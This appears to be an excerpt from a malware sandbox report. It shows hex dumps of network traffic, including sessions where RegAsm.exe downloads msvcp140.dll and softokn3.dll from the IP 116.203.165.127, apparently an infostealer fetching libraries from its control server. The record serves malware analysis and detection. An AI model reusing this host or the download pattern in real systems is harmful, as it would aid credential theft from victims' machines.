                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                                                                                Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                                                                                Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                                                                                Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                                                                                Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                                                                                Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                                                                                Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.949778116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:10 UTC200OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:10 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:10 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                                                                                Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                                                                                Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                                                                                Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                                                                                Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                                                                                Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                                                                                Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                                                                                                Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                                                                                Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                                                                                2024-09-21 11:35:11 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                                                                                Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.949779116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC200OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:12 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:12 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                                                                                                Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
